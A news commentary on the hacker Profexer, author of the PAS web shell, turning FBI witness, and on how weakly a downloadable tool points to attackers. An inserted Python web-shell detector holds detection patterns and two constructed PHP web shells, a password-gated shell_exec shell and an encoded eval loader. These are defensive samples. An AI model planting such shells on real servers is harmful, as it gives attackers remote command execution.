Ukrainian hacker could help lift fog on Russia’s role in U.S. election

Mystery of cyber attack deepens as malware writer becomes witness for FBI


In all the noise of this week's events, it would be easy to miss some dramatic news out of Kiev today. So I'll amplify it here. A Ukrainian hacker who wrote code that might have helped hack the U.S. election, and other political events around the world, has turned FBI witness, The New York Times says.

Bob Sullivan, journalist and one of the founding members of

His pseudonym is Profexer, and plenty of people are wondering about his safety right now.

Below is a brief synopsis, but you should really read the entire report.

As with all things cyber, and all things political, it's not as clear as one would wish. Profexer is a well-regarded Ukrainian hacker who wrote a hacker tool sometimes called PAS. It's one of several tools a hacker might use when taking over a network. Essentially, it's a base of operations installed after a successful break-in: a web shell, a script planted on a compromised web server that lets a remote hacker easily open a "shell", a prompt for executing commands, on that server.
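PAS is a web shell written in PHP, so the practical question for a defender is how such a "base of operations" is spotted on a server after the break-in. The following is an added example, not the article's, Wordfence's or Profexer's code, and it carries no signature for PAS itself: a small Python triage script that scans PHP sources for the two behaviours a web shell almost always shows, attacker-supplied request data flowing into code or command execution, and a hard-coded password gate in front of it. The indicator patterns, file paths and file contents are all constructed for the example.

```python
"""Heuristic web-shell triage for PHP files.

Added example for this article; it is not the article's, Wordfence's or
Profexer's code, and it carries no signature for PAS itself.  It flags the
two things a post-compromise "base of operations" almost always does:
route attacker-supplied request data into code or command execution, and
gate that behind a hard-coded password.  All file contents below are
constructed samples.
"""
from __future__ import annotations

import re

# PHP superglobals an attacker can populate from an HTTP request.
_REQ = r"\$_(?:GET|POST|REQUEST|COOKIE)"

# Assumed heuristics, not a vendor rule set.  `[^;]*` keeps each match
# inside a single PHP statement so unrelated lines do not chain together.
INDICATORS: dict[str, re.Pattern[str]] = {
    # eval(...$_POST['x']...): request data executed as PHP code.
    "request_to_eval": re.compile(r"\beval\s*\([^;]*" + _REQ),
    # system()/shell_exec()/... fed from the request: the remote "shell".
    "request_to_system": re.compile(
        r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\([^;]*" + _REQ
    ),
    # eval(gzinflate(base64_decode(...))): payload hidden from plain grep.
    "encoded_payload": re.compile(
        r"\beval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\("
    ),
    # $_POST['pw'] === 'secret': a login gate in front of the shell.
    "password_gate": re.compile(
        _REQ + r"""\[[^\]]+\]\s*[!=]==?\s*['"][^'"]{4,}['"]"""
    ),
}

# Constructed sample tree: one benign script and two planted shells.
SAMPLE_FILES: dict[str, str] = {
    # Benign: reads request input but never executes it.
    "contact.php": (
        '<?php\n'
        '$name = htmlspecialchars($_POST["name"]);\n'
        'echo "Thanks, $name";\n'
    ),
    # Minimal password-gated command shell of the kind the article describes
    # (constructed, not PAS source).
    "wp-content/uploads/cache.php": (
        '<?php\n'
        'if ($_POST["pw"] !== "s3cret") { die(); }\n'
        'echo "<pre>" . shell_exec($_POST["cmd"]) . "</pre>";\n'
    ),
    # Obfuscated loader: payload arrives encoded, is decoded, then eval'd.
    "images/.thumbs.php": (
        '<?php eval(gzinflate(base64_decode($_REQUEST["z"])));\n'
    ),
}


def scan(source: str) -> list[str]:
    """Return the names of every indicator that fires on one file's source."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def triage(files: dict[str, str], min_hits: int = 2) -> dict[str, list[str]]:
    """Rank files by indicator count.

    A single hit is often noise (legitimate admin panels do call exec()),
    so the default only reports files where two or more indicators agree.
    """
    flagged: dict[str, list[str]] = {}
    for path, source in files.items():
        hits = scan(source)
        if len(hits) >= min_hits:
            flagged[path] = hits
    return dict(sorted(flagged.items(), key=lambda kv: -len(kv[1])))


if __name__ == "__main__":
    for path, hits in triage(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(hits)}")
```

Run against the constructed tree, the benign contact form is silent, while both planted files trip two indicators each. Note what a hit does and does not tell you: it identifies a tool, or a family of tools, on the box. As the rest of this piece stresses, a tool that anyone can download says nothing by itself about who deployed it.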


In the days after the election, but before the inauguration, the Obama administration accused Russia of hacking the election and offered a few crumbs of digital forensic evidence. Chief among them: use of the PAS shell program. Profexer made the tool.

Hacker comes forward

Profexer didn't do the hacking, but the release scared him. Soon after, the Times now reports, Profexer got very cold feet, and turned himself in to Ukrainian authorities for a chat. Because making software generally isn't a crime, he was not charged with anything. The Times quotes Ukrainian officials as saying he is, instead, a cooperating witness, a very rare human being from the underground appearing in flesh and blood, apparently offering to help the FBI chase down other hackers. Perhaps, helping chase down Russians who did the hacking.

Several things muddy the waters here. An analysis published by Wordfence does confirm that the code cited in the U.S. analysis is Profexer's. But, oddly enough, it was an old, outdated version of Profexer's software. It would have been available from any number of places, and was fairly widely used. So by itself, use of PAS means almost nothing about who the attackers were. U.S. election hackers could have downloaded it from anywhere.

Coding for cash

Still, the Times points out that Profexer did work for hire, too: he wrote special versions of his tool for money. And in another political hacking incident involving Ukraine, authorities found digital fingerprints of Profexer's code. Clearly, he must know interesting people. Perhaps Russians.

Once again, we are back to the problem of attribution in cyber attacks. Nation-states often don't attack each other directly in cyberspace. There's no need. There are so many other ways to do it. Cyber armies are outsourced to give plausible deniability. Were the Russians looking to hack a U.S. election, they wouldn't need to assign the task to a cyber army. They could hire freelance hackers to do it. Better yet, lone actors might do some of the work on their own, out of patriotism, with a wink and a nod from authorities. And you can imagine a murky continuum between those two things.

Also quite possible: A freelance hacker could be hired without any idea who was paying him or her. Profexer could have been commissioned to write code for the Russians, or for that matter, any country, and have no idea who was signing the check.

Many question marks remain

It is a very big deal that this hacker is talking to authorities. One imagines his Rolodex is fascinating. But as with all spook stories, it's important to remember what is known and what is a guess. As Wordfence put it, we know the U.S. government says old code was used to hack the election, and we know government officials say the person who wrote that code is now cooperating with authorities. That's about it.

It's also important to note that we rarely learn such things unless someone wants us to know, for a reason. Why are authorities confirming Profexer's cooperation now? Perhaps they are turning up the heat on those who paid him. Perhaps they are close to a break in the case. Or perhaps they are throwing a Hail Mary pass.

Let's hope Profexer has plenty of time to tell his stories.
